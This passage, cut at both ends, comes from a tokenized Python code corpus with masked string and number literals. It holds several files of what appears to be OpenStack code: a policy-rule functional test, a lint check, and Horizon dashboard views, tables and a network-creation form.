info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> act_uuid = self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:1> , '<STR_LIT:action>' , self . act_name ) <EOL> if act_uuid == <NUM_LIT:0> : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> os . _exit ( <NUM_LIT:1> ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> self . cls_name , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = "<STR_LIT>" ) <EOL> if cls_uuid == <NUM_LIT:0> : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , <EOL> self . cls_name , <EOL> id = cls_uuid , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for n in range ( <NUM_LIT:1> , <NUM_LIT:11> ) : <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' % <EOL> ( n ) , classifier = cls_uuid , action = act_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( n ) ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_policy_verify_all ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % <EOL> ( n ) , <EOL> policy_classifier_id = cls_uuid , <EOL> policy_actions = act_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( n ) ) <EOL> return <NUM_LIT:0> <EOL> self . _log . 
info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:11> ) : <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:0> , '<STR_LIT>' , '<STR_LIT>' % <EOL> ( i ) ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:1> , '<STR_LIT>' , id = cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import re <EOL> """<STR_LIT>""" <EOL> mutable_default_args = re . compile ( r"<STR_LIT>" ) <EOL> def no_mutable_default_args ( logical_line ) : <EOL> msg = "<STR_LIT>" <EOL> if mutable_default_args . match ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , msg ) <EOL> def factory ( register ) : <EOL> register ( no_mutable_default_args ) </s>
<s> from django . conf . urls import url <EOL> from horizon . test . test_dashboards . cats . kittens . views import IndexView <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> ] </s>
<s> import copy <EOL> from django . forms . utils import flatatt <EOL> class HTMLElement ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . attrs = getattr ( self , "<STR_LIT>" , { } ) <EOL> self . classes = getattr ( self , "<STR_LIT>" , [ ] ) <EOL> def get_default_classes ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> def get_default_attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def get_final_attrs ( self , classes = True ) : <EOL> """<STR_LIT>""" <EOL> final_attrs = copy . copy ( self . get_default_attrs ( ) ) <EOL> final_attrs . update ( self . attrs ) <EOL> if classes : <EOL> final_attrs [ '<STR_LIT:class>' ] = self . get_final_css ( ) <EOL> else : <EOL> final_attrs . pop ( '<STR_LIT:class>' , None ) <EOL> return final_attrs <EOL> def get_final_css ( self ) : <EOL> """<STR_LIT>""" <EOL> default = "<STR_LIT:U+0020>" . join ( self . get_default_classes ( ) ) <EOL> defined = self . attrs . get ( '<STR_LIT:class>' , '<STR_LIT>' ) <EOL> additional = "<STR_LIT:U+0020>" . join ( getattr ( self , "<STR_LIT>" , [ ] ) ) <EOL> non_empty = [ test for test in ( defined , default , additional ) if test ] <EOL> final_classes = "<STR_LIT:U+0020>" . join ( non_empty ) . strip ( ) <EOL> return final_classes <EOL> @ property <EOL> def attr_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return flatatt ( self . get_final_attrs ( ) ) <EOL> @ property <EOL> def attr_string_nc ( self ) : <EOL> """<STR_LIT>""" <EOL> return flatatt ( self . get_final_attrs ( False ) ) <EOL> @ property <EOL> def class_string ( self ) : <EOL> """<STR_LIT>""" <EOL> classes_str = "<STR_LIT:U+0020>" . join ( self . classes ) <EOL> return classes_str </s>
<s> """<STR_LIT>""" <EOL> from django . views import generic <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . api . rest import urls <EOL> from openstack_dashboard . api . rest import utils as rest_utils <EOL> @ urls . register <EOL> class Networks ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> tenant_id = request . user . tenant_id <EOL> result = api . neutron . network_list_for_tenant ( request , tenant_id ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> @ rest_utils . ajax ( data_required = True ) <EOL> def post ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if not api . neutron . is_port_profiles_supported ( ) : <EOL> request . DATA . pop ( "<STR_LIT>" , None ) <EOL> new_network = api . neutron . network_create ( request , ** request . DATA ) <EOL> return rest_utils . CreatedResponse ( <EOL> '<STR_LIT>' % new_network . id , <EOL> new_network . to_dict ( ) <EOL> ) <EOL> @ urls . register <EOL> class Subnets ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> result = api . neutron . subnet_list ( request , ** request . GET ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> @ rest_utils . ajax ( data_required = True ) <EOL> def post ( self , request ) : <EOL> """<STR_LIT>""" <EOL> new_subnet = api . neutron . subnet_create ( request , ** request . DATA ) <EOL> return rest_utils . CreatedResponse ( <EOL> '<STR_LIT>' % new_subnet . id , <EOL> new_subnet . to_dict ( ) <EOL> ) <EOL> @ urls . register <EOL> class Ports ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> result = api . neutron . port_list ( request , ** request . 
GET ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> @ urls . register <EOL> class Services ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if api . base . is_service_enabled ( request , '<STR_LIT>' ) and api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> result = api . neutron . agent_list ( request , ** request . GET ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> else : <EOL> raise rest_utils . AjaxError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> @ urls . register <EOL> class Extensions ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> result = api . neutron . list_extensions ( request ) <EOL> return { '<STR_LIT>' : [ e for e in result ] } </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tabs <EOL> from horizon import workflows <EOL> from openstack_dashboard . dashboards . admin . defaults import tabs as project_tabs <EOL> from openstack_dashboard . dashboards . admin . defaults import workflows as project_workflows <EOL> from openstack_dashboard . usage import quotas <EOL> class IndexView ( tabs . TabbedTableView ) : <EOL> tab_group_class = project_tabs . DefaultsTabs <EOL> template_name = '<STR_LIT>' <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> class UpdateDefaultQuotasView ( workflows . WorkflowView ) : <EOL> workflow_class = project_workflows . UpdateDefaultQuotas <EOL> def get_initial ( self ) : <EOL> initial = super ( UpdateDefaultQuotasView , self ) . get_initial ( ) <EOL> try : <EOL> quota_defaults = quotas . get_default_quota_data ( self . request ) <EOL> for field in ( quotas . QUOTA_FIELDS + quotas . MISSING_QUOTA_FIELDS ) : <EOL> initial [ field ] = quota_defaults . get ( field ) . limit <EOL> except Exception : <EOL> error_msg = _ ( '<STR_LIT>' ) <EOL> self . add_error_to_step ( error_msg , '<STR_LIT>' ) <EOL> return initial </s>
<s> from django import template <EOL> from django . template import defaultfilters as filters <EOL> from django . utils . translation import pgettext_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from horizon . utils import filters as utils_filters <EOL> SERVICE_ENABLED = "<STR_LIT>" <EOL> SERVICE_DISABLED = "<STR_LIT>" <EOL> SERVICE_STATUS_DISPLAY_CHOICES = ( <EOL> ( SERVICE_ENABLED , _ ( "<STR_LIT>" ) ) , <EOL> ( SERVICE_DISABLED , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> SERVICE_STATE_DISPLAY_CHOICES = ( <EOL> ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) , <EOL> ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> class ServiceFilterAction ( tables . FilterAction ) : <EOL> filter_field = '<STR_LIT:type>' <EOL> def filter ( self , table , services , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( service ) : <EOL> attr = getattr ( service , self . filter_field , '<STR_LIT>' ) <EOL> if attr is not None and q in attr . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , services ) <EOL> class SubServiceFilterAction ( ServiceFilterAction ) : <EOL> filter_field = '<STR_LIT>' <EOL> def get_status ( service ) : <EOL> if service . host : <EOL> return SERVICE_ENABLED if not service . disabled else SERVICE_DISABLED <EOL> return None <EOL> class ServicesTable ( tables . DataTable ) : <EOL> id = tables . Column ( '<STR_LIT:id>' , hidden = True ) <EOL> name = tables . Column ( "<STR_LIT:name>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> service_type = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . 
Column ( get_status , <EOL> verbose_name = _ ( '<STR_LIT>' ) , <EOL> status = True , <EOL> display_choices = SERVICE_STATUS_DISPLAY_CHOICES ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( ServiceFilterAction , ) <EOL> multi_select = False <EOL> status_columns = [ "<STR_LIT:status>" ] <EOL> def get_available ( zone ) : <EOL> return zone . zoneState [ '<STR_LIT>' ] <EOL> def get_agent_status ( agent ) : <EOL> template_name = '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT:status>' : agent . status , <EOL> '<STR_LIT>' : agent . disabled_reason <EOL> } <EOL> return template . loader . render_to_string ( template_name , context ) <EOL> class NovaServicesTable ( tables . DataTable ) : <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> zone = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_agent_status , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( '<STR_LIT:state>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = SERVICE_STATE_DISPLAY_CHOICES ) <EOL> updated_at = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT>" % ( obj . binary , obj . host , obj . zone ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( SubServiceFilterAction , ) <EOL> multi_select = False <EOL> class CinderServicesTable ( tables . DataTable ) : <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> zone = tables . 
Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_agent_status , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( '<STR_LIT:state>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = SERVICE_STATE_DISPLAY_CHOICES ) <EOL> updated_at = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT>" % ( obj . binary , obj . host , obj . zone ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( SubServiceFilterAction , ) <EOL> multi_select = False <EOL> class NetworkAgentsFilterAction ( tables . FilterAction ) : <EOL> def filter ( self , table , agents , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( agent ) : <EOL> if q in agent . agent_type . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , agents ) <EOL> def get_network_agent_status ( agent ) : <EOL> if agent . admin_state_up : <EOL> return _ ( '<STR_LIT>' ) <EOL> return _ ( '<STR_LIT>' ) <EOL> def get_network_agent_state ( agent ) : <EOL> if agent . alive : <EOL> return _ ( '<STR_LIT>' ) <EOL> return _ ( '<STR_LIT>' ) <EOL> class NetworkAgentsTable ( tables . DataTable ) : <EOL> agent_type = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_network_agent_status , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( get_network_agent_state , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> heartbeat_timestamp = tables . 
Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT>" % ( obj . binary , obj . host ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( NetworkAgentsFilterAction , ) <EOL> multi_select = False <EOL> class HeatServiceFilterAction ( tables . FilterAction ) : <EOL> filter_field = '<STR_LIT:type>' <EOL> def filter ( self , table , services , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( service ) : <EOL> attr = getattr ( service , self . filter_field , '<STR_LIT>' ) <EOL> if attr is not None and q in attr . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , services ) <EOL> class HeatServiceTable ( tables . DataTable ) : <EOL> hostname = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> engine_id = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> topic = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( '<STR_LIT:status>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = SERVICE_STATE_DISPLAY_CHOICES ) <EOL> updated_at = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT:%s>" % obj . engine_id <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( HeatServiceFilterAction , ) <EOL> multi_select = False </s>
<s> import logging <EOL> from django . conf import settings <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from openstack_dashboard import api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> PROVIDER_TYPES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> } <EOL> SEGMENTATION_ID_RANGE = { <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ( <NUM_LIT:2> ** <NUM_LIT:32> ) - <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ( <NUM_LIT:2> ** <NUM_LIT> ) - <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ( <NUM_LIT:2> ** <NUM_LIT> ) - <NUM_LIT:1> ) , <EOL> } <EOL> DEFAULT_PROVIDER_TYPES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class CreateNetwork ( forms . SelfHandlingForm ) : <EOL> name = forms . 
CharField ( max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT:Name>" ) , <EOL> required = False ) <EOL> tenant_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> widget = None <EOL> else : <EOL> widget = forms . HiddenInput ( ) <EOL> net_profile_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = widget ) <EOL> network_type = forms . ChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> widget = forms . Select ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) ) <EOL> physical_network = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> initial = '<STR_LIT:default>' , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) ) <EOL> segmentation_id = forms . IntegerField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) ) <EOL> admin_state = forms . ChoiceField ( choices = [ ( True , _ ( '<STR_LIT>' ) ) , <EOL> ( False , _ ( '<STR_LIT>' ) ) ] , <EOL> label = _ ( "<STR_LIT>" ) ) <EOL> shared = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = False , required = False ) <EOL> external = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = False , required = False ) <EOL> @ classmethod <EOL> def _instantiate ( cls , request , * args , ** kwargs ) : <EOL> return cls ( request , * args , ** kwargs ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( CreateNetwork , self ) . __init__ ( request , * args , ** kwargs ) <EOL> tenant_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> tenants , has_more = api . keystone . 
tenant_list ( request ) <EOL> for tenant in tenants : <EOL> if tenant . enabled : <EOL> tenant_choices . append ( ( tenant . id , tenant . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = tenant_choices <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> self . fields [ '<STR_LIT>' ] . choices = ( <EOL> self . get_network_profile_choices ( request ) ) <EOL> if api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> neutron_settings = getattr ( settings , <EOL> '<STR_LIT>' , { } ) <EOL> self . seg_id_range = SEGMENTATION_ID_RANGE . copy ( ) <EOL> seg_id_range = neutron_settings . get ( '<STR_LIT>' ) <EOL> if seg_id_range : <EOL> self . seg_id_range . update ( seg_id_range ) <EOL> self . provider_types = PROVIDER_TYPES . copy ( ) <EOL> extra_provider_types = neutron_settings . get ( '<STR_LIT>' ) <EOL> if extra_provider_types : <EOL> self . provider_types . update ( extra_provider_types ) <EOL> self . nettypes_with_seg_id = [ <EOL> net_type for net_type in self . provider_types <EOL> if self . provider_types [ net_type ] [ '<STR_LIT>' ] ] <EOL> self . nettypes_with_physnet = [ <EOL> net_type for net_type in self . provider_types <EOL> if self . provider_types [ net_type ] [ '<STR_LIT>' ] ] <EOL> supported_provider_types = neutron_settings . get ( <EOL> '<STR_LIT>' , DEFAULT_PROVIDER_TYPES ) <EOL> if supported_provider_types == [ '<STR_LIT:*>' ] : <EOL> supported_provider_types = DEFAULT_PROVIDER_TYPES <EOL> undefined_provider_types = [ <EOL> net_type for net_type in supported_provider_types <EOL> if net_type not in self . provider_types ] <EOL> if undefined_provider_types : <EOL> LOG . error ( '<STR_LIT>' , <EOL> undefined_provider_types ) <EOL> seg_id_help = [ <EOL> _ ( "<STR_LIT>" ) <EOL> % { '<STR_LIT:type>' : net_type , <EOL> '<STR_LIT>' : self . seg_id_range [ net_type ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . seg_id_range [ net_type ] [ <NUM_LIT:1> ] } <EOL> for net_type in self . nettypes_with_seg_id ] <EOL> self . 
fields [ '<STR_LIT>' ] . help_text = '<STR_LIT:U+0020>' . join ( seg_id_help ) <EOL> attrs = dict ( ( '<STR_LIT>' % network_type , <EOL> _ ( '<STR_LIT>' ) ) <EOL> for network_type in self . nettypes_with_seg_id ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( attrs ) <EOL> attrs = dict ( ( '<STR_LIT>' % network_type , <EOL> _ ( '<STR_LIT>' ) ) <EOL> for network_type in self . nettypes_with_physnet ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( attrs ) <EOL> network_type_choices = [ <EOL> ( net_type , self . provider_types [ net_type ] [ '<STR_LIT>' ] ) <EOL> for net_type in supported_provider_types ] <EOL> if len ( network_type_choices ) == <NUM_LIT:0> : <EOL> self . _hide_provider_network_type ( ) <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . choices = network_type_choices <EOL> else : <EOL> self . _hide_provider_network_type ( ) <EOL> def get_network_profile_choices ( self , request ) : <EOL> profile_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> for profile in self . _get_profiles ( request , '<STR_LIT>' ) : <EOL> profile_choices . append ( ( profile . id , profile . name ) ) <EOL> return profile_choices <EOL> def _get_profiles ( self , request , type_p ) : <EOL> profiles = [ ] <EOL> try : <EOL> profiles = api . neutron . profile_list ( request , type_p ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg ) <EOL> return profiles <EOL> def _hide_provider_network_type ( self ) : <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . HiddenInput ( ) <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . HiddenInput ( ) <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . HiddenInput ( ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . 
required = False <EOL> def handle ( self , request , data ) : <EOL> try : <EOL> params = { '<STR_LIT:name>' : data [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : ( data [ '<STR_LIT>' ] == '<STR_LIT:True>' ) , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] } <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> if api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> network_type = data [ '<STR_LIT>' ] <EOL> params [ '<STR_LIT>' ] = network_type <EOL> if network_type in self . nettypes_with_physnet : <EOL> params [ '<STR_LIT>' ] = ( <EOL> data [ '<STR_LIT>' ] ) <EOL> if network_type in self . nettypes_with_seg_id : <EOL> params [ '<STR_LIT>' ] = ( <EOL> data [ '<STR_LIT>' ] ) <EOL> network = api . neutron . network_create ( request , ** params ) <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> LOG . debug ( msg ) <EOL> messages . success ( request , msg ) <EOL> return network <EOL> except Exception : <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( CreateNetwork , self ) . clean ( ) <EOL> if api . neutron . is_extension_supported ( self . request , '<STR_LIT>' ) : <EOL> self . _clean_physical_network ( cleaned_data ) <EOL> self . _clean_segmentation_id ( cleaned_data ) <EOL> return cleaned_data <EOL> def _clean_physical_network ( self , data ) : <EOL> network_type = data . get ( '<STR_LIT>' ) <EOL> if ( '<STR_LIT>' in self . _errors and <EOL> network_type not in self . nettypes_with_physnet ) : <EOL> del self . _errors [ '<STR_LIT>' ] <EOL> def _clean_segmentation_id ( self , data ) : <EOL> network_type = data . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . _errors : <EOL> 